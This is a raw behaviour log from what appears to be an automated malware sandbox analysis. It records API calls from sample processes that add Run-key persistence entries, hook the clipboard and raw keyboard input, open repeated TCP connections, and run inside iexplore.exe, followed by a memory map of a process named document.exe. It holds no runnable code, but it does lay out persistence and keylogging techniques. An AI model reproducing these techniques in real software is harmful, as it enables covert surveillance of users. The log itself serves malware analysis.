Module	Load	module_name = kernel32, base_address = 0x76220000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x7624d4f7	1	Fn
Module	Load	module_name = advapi32, base_address = 0x76490000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyW, address_out = 0x764a1514	1	Fn
Registry	Create Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	1	Fn
Module	Load	module_name = advapi32, base_address = 0x76490000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x764a14d6	1	Fn
Registry	Write Value	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value_name = I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441, data = C:\Users\aETAdzjz\AppData\Roaming\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441.exe, size = 222, type = REG_SZ	1	Fn
Module	Load	module_name = advapi32, base_address = 0x76490000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x764a469d	1	Fn
Module	Load	module_name = advapi32, base_address = 0x76490000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyW, address_out = 0x764a1514	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	1	Fn
Module	Load	module_name = advapi32, base_address = 0x76490000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x764a14d6	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value_name = I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441, data = 7173956, size = 222, type = REG_SZ	1	Fn
Module	Load	module_name = advapi32, base_address = 0x76490000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x764a469d	1	Fn
Module	Load	module_name = advapi32, base_address = 0x76490000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyW, address_out = 0x764a1514	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run	1	Fn
Module	Load	module_name = advapi32, base_address = 0x76490000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x764a14d6	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run, value_name = I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441, data = 7171660, size = 222, type = REG_SZ	1	Fn
Module	Load	module_name = advapi32, base_address = 0x76490000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x764a469d	1	Fn
Module	Load	module_name = KERNEL32, base_address = 0x76220000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = RtlMoveMemory, address_out = 0x77e83c40	1	Fn
Module	Load	module_name = user32.dll, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = SetTimer, address_out = 0x778379fb	1	Fn
System	Sleep	duration = 10000 milliseconds (10.000 seconds)	1	Fn
Module	Load	module_name = ws2_32.dll, base_address = 0x76450000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\ws2_32.dll, function = WSAStartup, address_out = 0x76453ab2	1	Fn
Module	Load	module_name = user32, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExA, address_out = 0x7783d22e	1	Fn
Window	Create	window_name = SOCKET_WINDOW, class_name = STATIC, wndproc_parameter = 0	1	Fn
Module	Load	module_name = user32, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongA, address_out = 0x77846110	1	Fn
Window	Set Attribute	window_name = SOCKET_WINDOW, class_name = STATIC, index = 18446744073709551612, new_long = 4206032	1	Fn
Module	Load	module_name = kernel32, base_address = 0x76220000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x76231b18	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Roaming\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\ut, type = file_attributes	1	Fn
Module	Load	module_name = KERNEL32, base_address = 0x76220000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetVersion, address_out = 0x76234467	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Load	module_name = Shell32, base_address = 0x76b00000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\shell32.dll, function = 261, address_out = 0x76d71a5f	1	Fn
File	Create	filename = C:\Users\aETAdzjz\AppData\Local\Temp\aETAdzjz.bmp, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Temp\aETAdzjz.bmp, type = file_type	1	Fn
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Temp\aETAdzjz.bmp, size = 49208	1	Fn Data
File	Create	filename = C:\Users\aETAdzjz\AppData\Roaming\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\ut, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Roaming\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\ut, type = file_type	1	Fn
File	Write	filename = C:\Users\aETAdzjz\AppData\Roaming\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\ut, size = 14	1	Fn Data
File	Write	filename = C:\Users\aETAdzjz\AppData\Roaming\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\ut, size = 49192	1	Fn Data
Module	Load	module_name = User32.dll, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x77838a29	1	Fn
Window	Create	class_name = EDIT, wndproc_parameter = 0	1	Fn
Module	Load	module_name = user32.dll, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = RegisterRawInputDevices, address_out = 0x778988eb	1	Fn
Module	Load	module_name = User32.dll, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = RegisterWindowMessageW, address_out = 0x77839ebd	1	Fn
Module	Load	module_name = Shell32, base_address = 0x76b00000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\shell32.dll, function = 181, address_out = 0x76b03b3a	1	Fn
Module	Load	module_name = user32.dll, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = SetClipboardViewer, address_out = 0x7784c4b6	1	Fn
Module	Load	module_name = user32.dll, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongA, address_out = 0x77846110	1	Fn
Window	Set Attribute	class_name = EDIT, index = 18446744073709551612, new_long = 4211776	1	Fn
System	Get Time	type = Local Time, time = 2018-11-05 09:30:14 (Local Time)	2	Fn
Module	Load	module_name = user32, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = SendMessageA, address_out = 0x7784612e	1	Fn
Module	Load	module_name = user32, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = CallWindowProcA, address_out = 0x7784792f	1	Fn
System	Get Time	type = Local Time, time = 2018-11-05 09:30:14 (Local Time)	2	Fn
Module	Load	module_name = ws2_32.dll, base_address = 0x76450000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\ws2_32.dll, function = htons, address_out = 0x76452d8b	1	Fn
Module	Load	module_name = ws2_32.dll, base_address = 0x76450000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\ws2_32.dll, function = inet_addr, address_out = 0x7645311b	1	Fn
Module	Get Filename	process_name = c:\program files (x86)\internet explorer\iexplore.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260	1	Fn
Module	Load	module_name = ws2_32.dll, base_address = 0x76450000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\ws2_32.dll, function = socket, address_out = 0x76453eb8	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Module	Load	module_name = ws2_32.dll, base_address = 0x76450000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\ws2_32.dll, function = connect, address_out = 0x76456bdd	1	Fn
Module	Load	module_name = ws2_32.dll, base_address = 0x76450000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\ws2_32.dll, function = closesocket, address_out = 0x76453918	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
System	Sleep	duration = 5000 milliseconds (5.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 232581	4	Fn
System	Get Time	type = Ticks, time = 233658	3	Fn
System	Get Time	type = Ticks, time = 236965	6	Fn
System	Get Time	type = Ticks, time = 237589	4	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Sleep	duration = 1 milliseconds (0.001 seconds)	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
System	Get Time	type = Ticks, time = 238790	4	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Sleep	duration = 1 milliseconds (0.001 seconds)	1	Fn
Module	Load	module_name = user32.dll, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = GetLastInputInfo, address_out = 0x7784b382	1	Fn
Module	Load	module_name = KERNEL32, base_address = 0x76220000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x7623110c	1	Fn
System	Get Time	type = Ticks, time = 238821	4	Fn
System	Get Time	type = Ticks, time = 239742	3	Fn
System	Get Time	type = Ticks, time = 240350	9	Fn
System	Get Time	type = Ticks, time = 240366	3	Fn
System	Get Time	type = Ticks, time = 242597	4	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Sleep	duration = 1 milliseconds (0.001 seconds)	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
System	Get Time	type = Ticks, time = 243876	3	Fn
Module	Load	module_name = user32.dll, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = GetRawInputData, address_out = 0x7789836f	1	Fn
Module	Load	module_name = user32.dll, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = PostMessageA, address_out = 0x77843baa	1	Fn
System	Get Time	type = Ticks, time = 246731	3	Fn
System	Get Time	type = Ticks, time = 246746	3	Fn
System	Get Time	type = Ticks, time = 246762	3	Fn
System	Get Time	type = Ticks, time = 246918	3	Fn
System	Get Time	type = Ticks, time = 247043	3	Fn
Module	Load	module_name = user32.dll, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = GetClassNameW, address_out = 0x778382a9	1	Fn
System	Get Time	type = Local Time, time = 2018-11-05 09:30:30 (Local Time)	2	Fn
Module	Load	module_name = user32.dll, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = SetTimer, address_out = 0x778379fb	1	Fn
System	Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 247355	3	Fn
Module	Load	module_name = user32.dll, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = KillTimer, address_out = 0x778379db	1	Fn
System	Get Time	type = Local Time, time = 2018-11-05 09:30:30 (Local Time)	2	Fn
Module	Load	module_name = user32.dll, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = GetClassNameW, address_out = 0x778382a9	1	Fn
System	Get Time	type = Local Time, time = 2018-11-05 09:30:30 (Local Time)	2	Fn
Module	Load	module_name = user32.dll, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = SetTimer, address_out = 0x778379fb	1	Fn
System	Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
System	Get Time	type = Ticks, time = 247370	3	Fn
System	Get Time	type = Ticks, time = 247604	4	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Sleep	duration = 1 milliseconds (0.001 seconds)	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
System	Get Time	type = Ticks, time = 248883	1	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Sleep	duration = 1 milliseconds (0.001 seconds)	1	Fn
System	Get Time	type = Ticks, time = 248899	4	Fn
System	Get Time	type = Ticks, time = 249398	3	Fn
System	Get Time	type = Ticks, time = 250319	9	Fn
System	Get Time	type = Ticks, time = 250334	3	Fn
System	Get Time	type = Ticks, time = 250350	6	Fn
System	Get Time	type = Ticks, time = 250366	3	Fn
System	Get Time	type = Ticks, time = 250381	6	Fn
System	Get Time	type = Ticks, time = 250397	6	Fn
System	Get Time	type = Ticks, time = 250490	6	Fn
System	Get Time	type = Ticks, time = 251426	3	Fn
System	Get Time	type = Ticks, time = 252440	3	Fn
System	Get Time	type = Ticks, time = 252612	4	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
System	Sleep	duration = 1 milliseconds (0.001 seconds)	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Module	Load	module_name = user32.dll, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = KillTimer, address_out = 0x778379db	1	Fn
System	Get Time	type = Local Time, time = 2018-11-05 09:30:37 (Local Time)	2	Fn
Module	Load	module_name = user32.dll, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = GetClassNameW, address_out = 0x778382a9	1	Fn
Module	Load	module_name = user32.dll, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongA, address_out = 0x77846110	1	Fn
Window	Set Attribute	class_name = EDIT, index = 18446744073709551612, new_long = 18446744073709486703	1	Fn
Module	Load	module_name = user32.dll, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x77839a55	1	Fn

Process #12: document.exe

119

0

»

Information	Value
ID	#12
File Name	c:\users\aetadzjz\appdata\roaming\document\document.exe
Command Line	"C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:03:33, Reason: Child Process
Unmonitor	End Time: 00:03:48, Reason: Self Terminated
Monitor Duration	00:00:15

OS Process Information

»

Information	Value
PID	0xb6c
Parent PID	0xa68 (c:\users\aetadzjz\appdata\roaming\document\document.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B84

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	rw	-
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	rw	-
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	r	-
locale.nls	0x001a0000	0x00206fff	Memory Mapped File	r	-
private_0x0000000000210000	0x00210000	0x00210fff	Private Memory	rwx	-
pagefile_0x0000000000220000	0x00220000	0x00226fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000230000	0x00230000	0x00231fff	Pagefile Backed Memory	rw	-
private_0x0000000000240000	0x00240000	0x0024ffff	Private Memory	rw	-
private_0x0000000000290000	0x00290000	0x0030ffff	Private Memory	rw	-
private_0x0000000000310000	0x00310000	0x0037ffff	Private Memory	rw	-
private_0x0000000000390000	0x00390000	0x0039ffff	Private Memory	rw	-
document.exe	0x00400000	0x004b2fff	Memory Mapped File	rwx	... Region Actions Download Dump
pagefile_0x00000000004c0000	0x004c0000	0x0059efff	Pagefile Backed Memory	r	-
private_0x00000000005b0000	0x005b0000	0x006affff	Private Memory	rw	-
pagefile_0x00000000006b0000	0x006b0000	0x00837fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000840000	0x00840000	0x009c0fff	Pagefile Backed Memory	r	-
pagefile_0x00000000009d0000	0x009d0000	0x01dcffff	Pagefile Backed Memory	r	-
private_0x0000000001dd0000	0x01dd0000	0x01ecffff	Private Memory	-	-
private_0x0000000001ed0000	0x01ed0000	0x020effff	Private Memory	rw	-
staticcache.dat	0x020f0000	0x02a1ffff	Memory Mapped File	r	-
pagefile_0x0000000002a20000	0x02a20000	0x02e12fff	Pagefile Backed Memory	r	-
version.dll	0x74ba0000	0x74ba8fff	Memory Mapped File	rwx	-
dwmapi.dll	0x751f0000	0x75202fff	Memory Mapped File	rwx	-
uxtheme.dll	0x75210000	0x7528ffff	Memory Mapped File	rwx	-
wow64cpu.dll	0x752a0000	0x752a7fff	Memory Mapped File	rwx	-
wow64win.dll	0x752b0000	0x7530bfff	Memory Mapped File	rwx	-
wow64.dll	0x75310000	0x7534efff	Memory Mapped File	rwx	-
comctl32.dll	0x75460000	0x754e3fff	Memory Mapped File	rwx	-
cryptbase.dll	0x75970000	0x7597bfff	Memory Mapped File	rwx	-
sspicli.dll	0x75980000	0x759dffff	Memory Mapped File	rwx	-
sechost.dll	0x759e0000	0x759f8fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75a10000	0x75abbfff	Memory Mapped File	rwx	-
imm32.dll	0x75c00000	0x75c5ffff	Memory Mapped File	rwx	-
shlwapi.dll	0x75c60000	0x75cb6fff	Memory Mapped File	rwx	-
ole32.dll	0x75cf0000	0x75e4bfff	Memory Mapped File	rwx	-
msctf.dll	0x75e50000	0x75f1bfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75f40000	0x75f85fff	Memory Mapped File	rwx	-
usp10.dll	0x75fa0000	0x7603cfff	Memory Mapped File	rwx	-
rpcrt4.dll	0x760d0000	0x761bffff	Memory Mapped File	rwx	-
kernel32.dll	0x76220000	0x7632ffff	Memory Mapped File	rwx	-
advapi32.dll	0x76490000	0x7652ffff	Memory Mapped File	rwx	-
oleaut32.dll	0x76720000	0x767aefff	Memory Mapped File	rwx	-
gdi32.dll	0x76a70000	0x76afffff	Memory Mapped File	rwx	-
shell32.dll	0x76b00000	0x77749fff	Memory Mapped File	rwx	-
comdlg32.dll	0x77780000	0x777fafff	Memory Mapped File	rwx	-
lpk.dll	0x77810000	0x77819fff	Memory Mapped File	rwx	-
user32.dll	0x77820000	0x7791ffff	Memory Mapped File	rwx	-
private_0x0000000077a20000	0x77a20000	0x77b19fff	Private Memory	rwx	-
private_0x0000000077b20000	0x77b20000	0x77c3efff	Private Memory	rwx	-
ntdll.dll	0x77c40000	0x77de8fff	Memory Mapped File	rwx	-
ntdll.dll	0x77e20000	0x77f9ffff	Memory Mapped File	rwx	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	r	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	rw	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	rw	-
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	rw	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	r	-

Threads

Thread 0xb84

119

0

»

Category	Operation	Information	Count	Logfile
Module	Get Handle	module_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, base_address = 0x400000	1	Fn
Keyboard	Get Info	type = 0, result_out = 4	1	Fn
System	Get Info	type = Operating System	2	Fn
Module	Get Filename	module_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 261	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 261	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Borland\Locales	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Borland\Locales	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	1	Fn
Module	Load	module_name = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.ENU, base_address = 0x0	1	Fn
Module	Load	module_name = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.EN, base_address = 0x0	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76220000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetDiskFreeSpaceExA, address_out = 0x762b434f	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\oleaut32.dll, base_address = 0x76720000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VariantChangeTypeEx, address_out = 0x76724c28	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarNeg, address_out = 0x7679c802	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarNot, address_out = 0x7679ec66	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarAdd, address_out = 0x76745934	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarSub, address_out = 0x7679d332	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarMul, address_out = 0x7679dbd4	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarDiv, address_out = 0x7679e405	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarIdiv, address_out = 0x7679f00a	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarMod, address_out = 0x7679f15e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarAnd, address_out = 0x76745a98	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarOr, address_out = 0x7679ecfa	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarXor, address_out = 0x7679ee2e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarCmp, address_out = 0x7673b0dc	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarI4FromStr, address_out = 0x76736fab	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarR4FromStr, address_out = 0x767401a0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarR8FromStr, address_out = 0x7673699e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarDateFromStr, address_out = 0x76746ba7	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarCyFromStr, address_out = 0x76766c12	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarBoolFromStr, address_out = 0x7673dbd1	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrFromCy, address_out = 0x76747fdc	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrFromDate, address_out = 0x76737a2a	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrFromBool, address_out = 0x76740355	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\user32.dll, base_address = 0x77820000	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = GetMonitorInfoA, address_out = 0x77844413	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x77837d2f	1	Fn
Keyboard	Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = EnumDisplayMonitors, address_out = 0x7784451a	1	Fn
Module	Get Filename	module_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 256	1	Fn
Window	Create	window_name = Document, class_name = TApplication, wndproc_parameter = 0	1	Fn
Window	Set Attribute	window_name = Document, class_name = TApplication, index = 18446744073709551612, new_long = 2166767	1	Fn
Keyboard	Get Info	type = KB_LOCALE_ID	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\user32.dll, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = AnimateWindow, address_out = 0x7784b531	1	Fn
Module	Get Handle	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75460000	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = InitializeFlatSB, address_out = 0x7549266f	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = UninitializeFlatSB, address_out = 0x75492542	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_GetScrollProp, address_out = 0x75491d29	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_SetScrollProp, address_out = 0x7549238d	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_EnableScrollBar, address_out = 0x754920c9	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_ShowScrollBar, address_out = 0x75491fdb	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_GetScrollRange, address_out = 0x75491e8d	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_GetScrollInfo, address_out = 0x75491f0f	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_GetScrollPos, address_out = 0x75491ccd	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_SetScrollPos, address_out = 0x7549216d	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_SetScrollInfo, address_out = 0x754922be	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_SetScrollRange, address_out = 0x754921e2	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\user32.dll, base_address = 0x77820000	1	Fn
